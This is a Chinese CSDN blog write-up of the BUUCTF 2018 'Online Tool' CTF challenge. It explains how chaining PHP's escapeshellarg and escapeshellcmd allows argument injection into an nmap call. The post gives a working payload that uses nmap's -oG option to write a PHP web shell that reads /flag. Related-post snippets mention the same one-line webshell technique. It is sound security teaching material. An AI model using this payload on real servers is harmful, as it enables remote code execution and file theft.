[BUUCTF 2018]Online Tool(特详解)

最新推荐文章于 2024-06-08 16:46:58 发布
最新推荐文章于 2024-06-08 16:46:58 发布
阅读量2w 收藏 10
点赞数 11
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/135899885
版权

这段代码块检查请求中是否设置了HTTP_X_FORWARDED_FOR头部。如果设置了,它将REMOTE_ADDR设置为HTTP_X_FORWARDED_FOR的值。这通常用于处理Web服务器位于代理后面的情况。

  • 如果URL中未设置host参数,它使用highlight_file(__FILE__);来显示PHP文件的源代码。

  • $host 字符串传递给 escapeshellarg 后,它会在字符串周围添加单引号,并对一些特殊字符进行转义,以防止它们被解释为特殊命令。

  • escapeshellcmd 函数用于转义字符串,并删除任何特殊字符,使其安全用作单个命令。

  • 如果设置了host参数,它获取该值,使用escapeshellargescapeshellcmd进行一些净化,创建基于客户端IP地址的唯一沙盒目录,然后在该沙盒内对指定的主机执行nmap命令。

注意:使用escapeshellargescapeshellcmd表明试图防止命令注入漏洞

chdir($sandbox);

  • chdir 函数用于改变当前的工作目录(Current Working Directory,CWD)为指定的目录。

  • 在这里,$sandbox 是之前根据用户IP地址创建的沙盒目录的名称(通过 md5("glzjin" . $_SERVER['REMOTE_ADDR']) 计算得到的)。

  • 这意味着 PHP 脚本的当前工作目录将被更改为用户特定的沙盒目录,后续的文件和命令将在这个目录下执行。

1,首先判断客户端提供给服务器和服务器自动获取的ip是否一致。 2,判断get host参数时候传值,没有传值高亮当前代码。 3,传值,host传递参数经过escapeshellarg,escapeshellcmd函数的限制。 4,以’glzjin’+ip通过md5加密形成值,并作为文件名创建文件,当前文件地址更改为创建的文件 5,输出 system执行结果。

通过其他师傅明白了点,原文PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org)

1. 传入的参数是:`172.17.0.2' -v -d a=1`
2. 经过`escapeshellarg`处理后变成了`'172.17.0.2'\'' -v -d a=1'`,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
3. 经过`escapeshellcmd`处理后变成`'172.17.0.2'\\'' -v -d a=1\'`,这是因为`escapeshellcmd`对`\`以及最后那个**不配对儿**的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php
4. 最后执行的命令是`curl '172.17.0.2'\\'' -v -d a=1\'`,由于中间的`\\`被解释为`\`而不再是转义字符,所以后面的`'`没有被转义,与再后面的`'`配对儿成了一个空白连接符。所以可以简化为`curl 172.17.0.2\ -v -d a=1'`,即向`172.17.0.2\`发起请求,POST 数据为`a=1'`。

但是经过上面的函数处理后变成了一个被单引号包围的字符串,不会当命令去执行,这里我们需要闭合一个单引号。

nmap有一个参数-oG可以实现将命令和结果写到文件

所以我们可以控制自己的输入写入文件,这里我们可以写入一句话木马链接,也可以直接命令 cat flag

flag

?host=' <?php echo `cat /flag`;?> -oG test.php '

这里注意用反引号cat /flag

image-20240128191921643

然后直接读取

image-20240128191936477

其实这里我是不太懂的,因为查資料escapeshellcmd会

反斜线(\)会在以下字符之前插入: *&#;`|*?~<>^()[]{}$*, \x0A\xFF'" 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 %! 字符都会被空格代替。

那么运行结果会是这样的

\<\?php echo \`cat /flag\`\;\?\> -oG test.php

image-20240128190320445

这个在php文件怎么执行呢?

然后

nmap -T5 -sT -Pn --host-timeout 2 -F  \<\?php echo \`cat /flag\`\;\?\> -oG test.php

image-20240128191343217

在 Linux 中,反斜杠(\)是转义字符,用于改变后面字符的原始意义。它告诉解释器后面的字符应该被特殊对待,而不是按照其原始含义解释。\\ 表示一个反斜杠字符。

就目前来看可以看到\都没有了只剩下了<?php echo `cat /flag`;?>

那一切都合理了\在linux中其实相当于无实义连接符

小小邵同学
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buu web:Online Tool(nmap文件写入)
m0_55378150的博客
04-05 573
打开靶场,好家伙,上来就是代码,我喜欢 老规矩,找核心代码 echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 这里调用了system函数使用了nmap命令,只有host参数是可控的,并且它是以get方式传入的,我们先测试一下本地ip:?host=127.0.0.1 正常回显,我们往回看看怎么利用 if(!isset($_GET['host'])) { highlight_file(__FILE__); } e
[BUUCTF 2018]Online Tool
m0_62709637的博客
05-09 1318
新知识: escapeshellarg()函数: 把字符串转码成可以在shell命令里使用的参数,将单引号进行转义,转义之后,再在左右加单引号; escapeshellcmd()函数: 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将&#;`|*?~<>^()[]{}$\, \x0A和\xFF以及不配对的单/双引号转义; 这两个函数若同时使用,将会产生逻辑漏洞; 个人理解防范原理:将殊符号进行转译处理,使其变为字符串,从而无法发挥正常作用; 绕过方
[BUUCTF 2018]Online Tool1
最新发布
m0_73673698的博客
06-08 599
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些殊符号前面加上\来转义…
BUUCTF-Online Tool
m0_47571887的博客
11-10 690
这道题真的挺不常见的,考的点也有点不常见 打开题目 一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解 大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。 在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
sqlTool.rar_Online SQL Tool_SQLTool_sqlto
09-24
标题中的"sqlTool.rar_Online SQL Tool_SQLTool_sqlto"提到了一个名为"SQLTool"的在线SQL处理工具。这个工具允许用户通过网络界面执行SQL语句,进行数据库的查询、更新、插入和删除等操作,无需在本地安装任何定的...
Seal Online Tool_tool_ToolsItem.scr_
10-02
《Seal Online Tool_tool_ToolsItem.scr》是一款专门针对网络游戏《封印传说》(Seal Online)的离线编辑工具。它主要用于编辑游戏中的物品脚本( SCR 文件),允许玩家在不连接到游戏服务器的情况下对游戏内的道具...
Audio Recorder Online-0.1.zip
12-27
名称:Audio Recorder Online -------------------- 版本:0.1 作者:Curt Norval 分类:其他 -------------------- 概述:“Audio Recorder Online”是一个允许您使用计算机麦克风录制音频的程序。 描述: “...
Online-Compile
01-30
Online_Compile
qt-unified-windows-x86-online.exe
07-14
"qt-unified-windows-x86-online.exe" 是一个用于Windows 32位系统的QT在线安装程序,它提供了方便的方式来下载和安装QT开发环境。 这个安装程序的核心功能包括: 1. **集成安装器**:qt-unified-windows-x86-on...
buuctf online_tool
weixin_43952190的博客
04-29 698
online_tool 进去后得到以上页面,其中设置X-Forwarded-For或者不设置不影响题目,它只是设置命名,$sandbox为目录名。 代码实现的功能就是在线进行namp扫描,通过get一个host主域名进行扫描。 对上面出现的nmap命令进行了解: -T5 : 可以加快或者减慢扫描速度,有六个级别,级别越高速度越快,也越容易被WAF或者IDS发现。 -sT:使用TCP Syn...
buuctfOnline tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3144
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
[CTFTraining] BUUCTF 2018 在线工具
ZXW_NUDT的博客
06-05 1688
[CTFTraining] BUUCTF 2018 在线工具
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3772
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
Qt Maintenance Tool 或 Qt Online Installer 这两个怎么下载
07-08
您可以按照以下步骤下载 Qt Maintenance Tool 或 Qt Online Installer: 1. 访问 Qt 官方网站:https://www.qt.io/ 。 2. 在页面右上角找到 "Download"(下载)按钮,点击进入下载页面。 3. 在下载页面,您会看到不同版本的 Qt。选择适合您操作系统的版本,并点击下载按钮。 4. 完成下载后,运行安装程序。 5. 在安装程序中,您可以选择安装的组件。确保选择安装 Qt Creator 和 Qt 组件。 6. 继续安装过程,直到完成安装。 安装完成后,您应该能够找到并启动 Qt Creator。在 Qt Creator 中,您可以使用 Maintenance Tool(维护工具)来管理已安装的组件、更新 Qt 版本、添加或删除驱动程序等。 希望这些步骤能够帮助您下载和安装 Qt Maintenance Tool 或 Qt Online Installer。如果您有任何进一步的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值